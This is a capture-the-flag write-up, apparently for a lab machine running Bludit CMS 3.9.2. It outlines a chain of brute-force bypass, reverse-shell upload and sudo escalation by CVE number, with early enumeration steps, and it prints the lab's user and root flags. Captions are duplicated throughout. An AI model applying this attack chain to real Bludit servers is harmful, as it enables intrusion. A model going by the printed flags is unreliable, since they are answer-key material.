11/2020

Description:

Target IP: 10.10.10.191.

The machine hosts a CMS system – Bludit version 3.9.2 which is vulnerable to a brute force mitigation bypass exploit (CVE-2019-17240). Initial access gained by brute-forcing passwords of a user mentioned in *todo.txt* file found on the web server directory. User access acquired by exploiting a Local File Inclusion vulnerability to upload a reverse shell to a known folder on the server and trigger it (CVE-2019-16113). The target machine is susceptible to sudo security bypass exploits which allows PE (CVE-2019-14287).

Difficulty:

easy

Flags:

User: b4d54f7900777b4017d9b89dcb735ab1

Root: 3f7e1a14027f840fb15dd72b4e9b5978

Enumeration

Nmap port scan result.

Nmap port scan result.

! Discovered service: HTTP (80)

Examining the Apache web server on the target machine.

Examining the Apache web server on the target machine.

A login form is found on

A login form is found on /admin

! Discover product: Bludit CMS

<aside> 💡

Bludit is a free and open-source web and blog builder https://docs.bludit.com/en/

</aside>

Brute-forcing the directory of the targeted website with gobuster.

Brute-forcing the directory of the targeted website with gobuster.

! todo.txt is not a default file generated by server deployment.

Examining the content of .

Examining the content of todo.txt .

! Discover a possible user: fergus